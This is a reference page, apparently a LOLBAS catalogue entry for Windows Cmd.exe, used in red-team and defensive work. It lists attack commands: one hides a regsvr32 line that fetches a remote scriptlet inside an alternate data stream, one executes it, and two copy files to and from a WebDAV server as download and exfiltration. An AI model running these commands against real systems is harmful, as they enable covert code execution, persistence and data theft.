🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Cmd.exe

Cmd.exe

The command-line interpreter in Windows

ADS

Can be used to evade defensive countermeasures or to hide as a persistence mechanism

cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat

Add content to an Alternate Data Stream (ADS). — MITRE: T1564.004 — Privileges: User

Can be used to evade defensive countermeasures or to hide as a persistence mechanism

cmd.exe - < {PATH}:payload.bat

Execute payload.bat stored in an Alternate Data Stream (ADS). — MITRE: T1059.003 — Privileges: User

Download

Download/copy a file from a WebDAV server

type {PATH_SMB} > {PATH_ABSOLUTE}

Downloads a specified file from a WebDAV server to the target file. — MITRE: T1105 — Privileges: User

Upload

Upload a file to a WebDAV server

type {PATH_ABSOLUTE} > {PATH_SMB}

Uploads a specified file to a WebDAV server. — MITRE: T1048.003 — Privileges: User